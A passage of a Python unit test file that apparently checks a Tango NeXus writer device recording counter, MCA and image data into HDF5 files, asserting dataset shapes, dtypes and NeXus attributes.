self.assertEqual(len(mca.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = mca.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = mca.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "")
at = mca.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
dt = en.open("data")
self.assertTrue(dt.is_valid)
self.assertEqual(dt.name, "data")
self.assertEqual(len(dt.attributes), 1)
self.assertEqual(dt.size, 2)
at = dt.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXdata")
cnt = dt.open("cnt1")
self.assertTrue(cnt.is_valid)
# ???
self.assertEqual(cnt.name, "cnt1")
# self.assertEqual(cnt.name,"counter1")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(cnt.shape), 1)
self.assertEqual(cnt.shape, (2,))
self.assertEqual(cnt.dtype, "float64")
self.assertEqual(cnt.size, 2)
# print(cnt.read())
value = cnt[:]
for i in range(len(value)):
self.assertEqual(self._counter[1], value[i])
self.assertEqual(len(cnt.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = cnt.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = cnt.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "m")
at = cnt.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
mca = dt.open("data")
self.assertTrue(mca.is_valid)
self.assertEqual(mca.name, "data")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(mca.shape), 2)
self.assertEqual(mca.shape, (2, 2048))
self.assertEqual(mca.dtype, "float64")
self.assertEqual(mca.size, 4096)
value = mca.read()
for i in range(len(value[0])):
self.assertEqual(self._mca2[i], value[0][i])
for i in range(len(value[0])):
self.assertEqual(self._mca2[i], value[1][i])
self.assertEqual(len(mca.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = mca.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = mca.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "")
at = mca.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
f.close()
# check the created file
fname = '%s/%s%s_00003.h5' % (
os.getcwd(), self.__class__.__name__, fun)
f = H5CppWriter.open_file(fname, readonly=True)
f = f.root()
self.assertEqual(5, len(f.attributes))
self.assertEqual(f.attributes["file_name"][...], fname)
self.assertTrue(f.attributes["NX_class"][...], "NXroot")
self.assertEqual(f.size, 2)
en = f.open("entry1")
self.assertTrue(en.is_valid)
self.assertEqual(en.name, "entry1")
self.assertEqual(len(en.attributes), 1)
self.assertEqual(en.size, 2)
at = en.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXentry")
# ins = f.open("entry1/instrument:NXinstrument") #bad exception
# ins = f.open("entry1/instrument")
ins = en.open("instrument")
self.assertTrue(ins.is_valid)
self.assertEqual(ins.name, "instrument")
self.assertEqual(len(ins.attributes), 2)
self.assertEqual(ins.size, 1)
at = ins.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXinstrument")
at = ins.attributes["short_name"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "short_name")
self.assertEqual(at[...], "scan instrument")
det = ins.open("detector")
self.assertTrue(det.is_valid)
self.assertEqual(det.name, "detector")
self.assertEqual(len(det.attributes), 1)
self.assertEqual(det.size, 2)
at = det.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXdetector")
# cnt = det.open("counter") # bad exception
cnt = det.open("counter1")
self.assertTrue(cnt.is_valid)
self.assertEqual(cnt.name, "counter1")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(cnt.shape), 1)
self.assertEqual(cnt.shape, (2,))
self.assertEqual(cnt.dtype, "float64")
self.assertEqual(cnt.size, 2)
value = cnt.read()
# value = cnt[:]
for i in range(len(value)):
self.assertEqual(self._counter[1 - i], value[i])
self.assertEqual(len(cnt.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = cnt.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = cnt.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "m")
at = cnt.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
mca = det.open("mca")
self.assertTrue(mca.is_valid)
self.assertEqual(mca.name, "mca")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(mca.shape), 2)
self.assertEqual(mca.shape, (2, 2048))
self.assertEqual(mca.dtype, "float64")
self.assertEqual(mca.size, 4096)
value = mca.read()
for i in range(len(value[0])):
self.assertEqual(self._mca2[i], value[0][i])
for i in range(len(value[0])):
self.assertEqual(self._mca1[i], value[1][i])
self.assertEqual(len(mca.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = mca.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = mca.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "")
at = mca.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
dt = en.open("data")
self.assertTrue(dt.is_valid)
self.assertEqual(dt.name, "data")
self.assertEqual(len(dt.attributes), 1)
self.assertEqual(dt.size, 2)
at = dt.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXdata")
cnt = dt.open("cnt1")
self.assertTrue(cnt.is_valid)
# ???
self.assertEqual(cnt.name, "cnt1")
# self.assertEqual(cnt.name,"counter1")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(cnt.shape), 1)
self.assertEqual(cnt.shape, (2,))
self.assertEqual(cnt.dtype, "float64")
self.assertEqual(cnt.size, 2)
# print(cnt.read())
value = cnt[:]
for i in range(len(value)):
self.assertEqual(self._counter[1 - i], value[i])
self.assertEqual(len(cnt.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = cnt.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = cnt.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "m")
at = cnt.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
mca = dt.open("data")
self.assertTrue(mca.is_valid)
self.assertEqual(mca.name, "data")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(mca.shape), 2)
self.assertEqual(mca.shape, (2, 2048))
self.assertEqual(mca.dtype, "float64")
self.assertEqual(mca.size, 4096)
value = mca.read()
for i in range(len(value[0])):
self.assertEqual(self._mca2[i], value[0][i])
for i in range(len(value[0])):
self.assertEqual(self._mca1[i], value[1][i])
self.assertEqual(len(mca.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = mca.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = mca.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "")
at = mca.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
f.close()
finally:
for i in range(1, 4):
fname = '%s/%s%s_%05d.h5' % (
os.getcwd(), self.__class__.__name__, fun, i)
if os.path.isfile(fname):
os.remove(fname)
if os.path.isfile(tfname):
os.remove(tfname)
# scanRecord test
# \brief It tests recording of simple h5 file
def test_scanRecordGrow3(self):
fun = sys._getframe().f_code.co_name
print("Run: %s.%s() " % (self.__class__.__name__, fun))
fname = "scantestgrow.h5"
try:
dp = PyTango.DeviceProxy(self._sv.device)
self.assertTrue(ProxyHelper.wait(dp, 10000))
# print 'attributes', dp.attribute_list_query()
# self.setProp(dp, "DefaultCanFail", False)
dp.FileName = fname
self.setProp(dp, "writer", "h5cpp")
dp.FileName = fname
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.OpenFile()
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.XMLSettings = self._scanXml3 % fname
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.OpenEntry()
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
cntg = [self._counter[0], self._counter[1]]
imageg = [self._image1a, self._image2a]
rec = {"data": {"exp_c01": cntg, "image": imageg}}
dp.Record(json.dumps(rec))
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
cntg = [self._counter[1], self._counter[0]]
imageg = [self._image2a, self._image1a]
rec = {"data": {"exp_c01": cntg, "image": imageg}}
dp.Record(json.dumps(rec))
dp.CloseEntry()
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.CloseFile()
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
# check the created file
f = H5CppWriter.open_file(fname, readonly=True)
f = f.root()
self.assertEqual(5, len(f.attributes))
self.assertEqual(f.attributes["file_name"][...], fname)
self.assertTrue(f.attributes["NX_class"][...], "NXroot")
self.assertEqual(f.size, 2)
en = f.open("entry1")
self.assertTrue(en.is_valid)
self.assertEqual(en.name, "entry1")
self.assertEqual(len(en.attributes), 1)
self.assertEqual(en.size, 2)
at = en.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXentry")
# ins = f.open("entry1/instrument:NXinstrument") #bad exception
# ins = f.open("entry1/instrument")
ins = en.open("instrument")
self.assertTrue(ins.is_valid)
self.assertEqual(ins.name, "instrument")
self.assertEqual(len(ins.attributes), 2)
self.assertEqual(ins.size, 1)
at = ins.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXinstrument")
at = ins.attributes["short_name"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "short_name")
self.assertEqual(at[...], "scan instrument")
det = ins.open("detector")
self.assertTrue(det.is_valid)
self.assertEqual(det.name, "detector")
self.assertEqual(len(det.attributes), 1)
self.assertEqual(det.size, 2)
at = det.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXdetector")
# cnt = det.open("counter") # bad exception
cnt = det.open("counter1")
self.assertTrue(cnt.is_valid)
self.assertEqual(cnt.name, "counter1")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(cnt.shape), 1)
self.assertEqual(cnt.shape, (4,))
self.assertEqual(cnt.dtype, "float64")
self.assertEqual(cnt.size, 4)
value = cnt.read()
# value = cnt[:]
for i in range(len(value)):
self.assertEqual(
self._counter[i if i < 2 else 3 - i], value[i])
self.assertEqual(len(cnt.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = cnt.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = cnt.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "m")
at = cnt.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
mca = det.open("image")
self.assertTrue(mca.is_valid)
self.assertEqual(mca.name, "image")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(mca.shape), 3)
self.assertEqual(mca.shape, (4, 100, 200))
self.assertEqual(mca.dtype, "int64")
self.assertEqual(mca.size, 80000)
value = mca.read()
for i in range(len(value[0])):
for j in range(len(value[0][0])):
self.assertEqual(self._image1a[i][j], value[0][i][j])
for i in range(len(value[0])):
for j in range(len(value[0][0])):
self.assertEqual(self._image2a[i][j], value[1][i][j])
for i in range(len(value[0])):
for j in range(len(value[0][0])):
self.assertEqual(self._image2a[i][j], value[2][i][j])
for i in range(len(value[0])):
for j in range(len(value[0][0])):
self.assertEqual(self._image1a[i][j], value[3][i][j])
self.assertEqual(len(mca.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = mca.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_INT64")
at = mca.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "")
at = mca.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
dt = en.open("data")
self.assertTrue(dt.is_valid)
self.assertEqual(dt.name, "data")
self.assertEqual(len(dt.attributes), 1)
self.assertEqual(dt.size, 2)
at = dt.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXdata")
cnt = dt.open("cnt1")
self.assertTrue(cnt.is_valid)
self.assertEqual(cnt.name, "cnt1")
# self.assertEqual(cnt.name,"counter1")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(cnt.shape), 1)
self.assertEqual(cnt.shape, (4,))
self.assertEqual(cnt.dtype, "float64")
self.assertEqual(cnt.size, 4)
# print(cnt.read())
value = cnt[:]
for i in range(len(value)):
self.assertEqual(
self._counter[i if i < 2 else 3 - i], value[i])
self.assertEqual(len(cnt.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = cnt.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = cnt.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "m")
at = cnt.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
mca = dt.open("data")
self.assertTrue(mca.is_valid)
self.assertEqual(mca.name, "data")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(mca.shape), 3)
self.assertEqual(mca.shape, (4, 100, 200))
self.assertEqual(mca.dtype, "int64")
self.assertEqual(mca.size, 80000)
value = mca.read()
for i in range(len(value[0])):
for j in range(len(value[0][0])):
self.assertEqual(self._image1a[i][j], value[0][i][j])
for i in range(len(value[0])):
for j in range(len(value[0][0])):
self.assertEqual(self._image2a[i][j], value[1][i][j])
for i in range(len(value[0])):
for j in range(len(value[0][0])):
self.assertEqual(self._image2a[i][j], value[2][i][j])
for i in range(len(value[0])):
for j in range(len(value[0][0])):
self.assertEqual(self._image1a[i][j], value[3][i][j])
self.assertEqual(len(mca.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = mca.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_INT64")
at = mca.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "")
at = mca.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
f.close()
finally:
if os.path.isfile(fname):
os.remove(fname)
# scanRecord test
# \brief It tests recording of simple h5 file
def test_scanRecordGrow3_false(self):
fun = sys._getframe().f_code.co_name
print("Run: %s.%s() " % (self.__class__.__name__, fun))
fname = "scantestgrow.h5"
try:
dp = PyTango.DeviceProxy(self._sv.device)
self.assertTrue(ProxyHelper.wait(dp, 10000))
# print 'attributes', dp.attribute_list_query()
self.setProp(dp, "DefaultCanFail", False)
dp.FileName = fname
self.setProp(dp, "writer", "h5cpp")
dp.FileName = fname
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.OpenFile()
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.XMLSettings = self._scanXml3 % fname
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.OpenEntry()
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
cntg = [self._counter[0], self._counter[1]]
imageg = [self._image1a, self._image2a]
rec = {"data": {"exp_c01": cntg, "image": imageg}}
dp.Record(json.dumps(rec))
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
cntg = [self._counter[1], self._counter[0]]
imageg = [self._image2a, self._image1a]
rec = {"data": {"exp_c01": cntg, "image": imageg}}
dp.Record(json.dumps(rec))
dp.CloseEntry()
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.CloseFile()
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
# check the created file
f = H5CppWriter.open_file(fname, readonly=True)
f = f.root()
self.assertEqual(5, len(f.attributes))
self.assertEqual(f.attributes["file_name"][...], fname)
self.assertTrue(f.attributes["NX_class"][...], "NXroot")
self.assertEqual(f.size, 2)
en = f.open("entry1")
self.assertTrue(en.is_valid)
self.assertEqual(en.name, "entry1")
self.assertEqual(len(en.attributes), 1)
self.assertEqual(en.size, 2)
at = en.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXentry")
# ins = f.open("entry1/instrument:NXinstrument") #bad exception
# ins = f.open("entry1/instrument")
ins = en.open("instrument")
self.assertTrue(ins.is_valid)
self.assertEqual(ins.name, "instrument")
self.assertEqual(len(ins.attributes), 2)
self.assertEqual(ins.size, 1)
at = ins.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXinstrument")
at = ins.attributes["short_name"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "short_name")
self.assertEqual(at[...], "scan instrument")
det = ins.open("detector")
self.assertTrue(det.is_valid)
self.assertEqual(det.name, "detector")
self.assertEqual(len(det.attributes), 1)
self.assertEqual(det.size, 2)
at = det.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXdetector")
# cnt = det.open("counter") # bad exception
cnt = det.open("counter1")
self.assertTrue(cnt.is_valid)
self.assertEqual(cnt.name, "counter1")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(cnt.shape), 1)
self.assertEqual(cnt.shape, (4,))
self.assertEqual(cnt.dtype, "float64")
self.assertEqual(cnt.size, 4)
value = cnt.read()
# value = cnt[:]
for i in range(len(value)):
self.assertEqual(
self._counter[i if i < 2 else 3 - i], value[i])
self.assertEqual(len(cnt.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
